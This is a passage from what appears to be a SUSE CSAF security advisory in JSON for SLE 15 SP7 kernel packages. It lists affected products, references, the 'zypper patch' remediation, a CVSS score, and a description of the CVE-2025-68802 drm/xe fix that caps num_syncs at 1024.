"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68801",
"url": "https://www.suse.com/security/cve/CVE-2025-68801"
},
{
"category": "external",
"summary": "SUSE Bug 1256653 for CVE-2025-68801",
"url": "https://bugzilla.suse.com/1256653"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68801"
},
{
"cve": "CVE-2025-68802",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68802"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe: Limit num_syncs to prevent oversized allocations\n\nThe exec and vm_bind ioctl allow userspace to specify an arbitrary\nnum_syncs value. Without bounds checking, a very large num_syncs\ncan force an excessively large allocation, leading to kernel warnings\nfrom the page allocator as below.\n\nIntroduce DRM_XE_MAX_SYNCS (set to 1024) and reject any request\nexceeding this limit.\n\n\"\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 1217 at mm/page_alloc.c:5124 __alloc_frozen_pages_noprof+0x2f8/0x2180 mm/page_alloc.c:5124\n...\nCall Trace:\n \u003cTASK\u003e\n alloc_pages_mpol+0xe4/0x330 mm/mempolicy.c:2416\n ___kmalloc_large_node+0xd8/0x110 mm/slub.c:4317\n __kmalloc_large_node_noprof+0x18/0xe0 mm/slub.c:4348\n __do_kmalloc_node mm/slub.c:4364 [inline]\n __kmalloc_noprof+0x3d4/0x4b0 mm/slub.c:4388\n kmalloc_noprof include/linux/slab.h:909 [inline]\n kmalloc_array_noprof include/linux/slab.h:948 [inline]\n xe_exec_ioctl+0xa47/0x1e70 drivers/gpu/drm/xe/xe_exec.c:158\n drm_ioctl_kernel+0x1f1/0x3e0 drivers/gpu/drm/drm_ioctl.c:797\n drm_ioctl+0x5e7/0xc50 drivers/gpu/drm/drm_ioctl.c:894\n xe_drm_ioctl+0x10b/0x170 drivers/gpu/drm/xe/xe_device.c:224\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:598 [inline]\n __se_sys_ioctl fs/ioctl.c:584 [inline]\n __x64_sys_ioctl+0x18b/0x210 fs/ioctl.c:584\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xbb/0x380 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n...\n\"\n\nv2: Add \"Reported-by\" and Cc stable kernels.\nv3: Change XE_MAX_SYNCS from 64 to 1024. (Matt \u0026 Ashutosh)\nv4: s/XE_MAX_SYNCS/DRM_XE_MAX_SYNCS/ (Matt)\nv5: Do the check at the top of the exec func. (Matt)\n\n(cherry picked from commit b07bac9bd708ec468cd1b8a5fe70ae2ac9b0a11c)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68802",
"url": "https://www.suse.com/security/cve/CVE-2025-68802"
},
{
"category": "external",
"summary": "SUSE Bug 1256661 for CVE-2025-68802",
"url": "https://bugzilla.suse.com/1256661"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
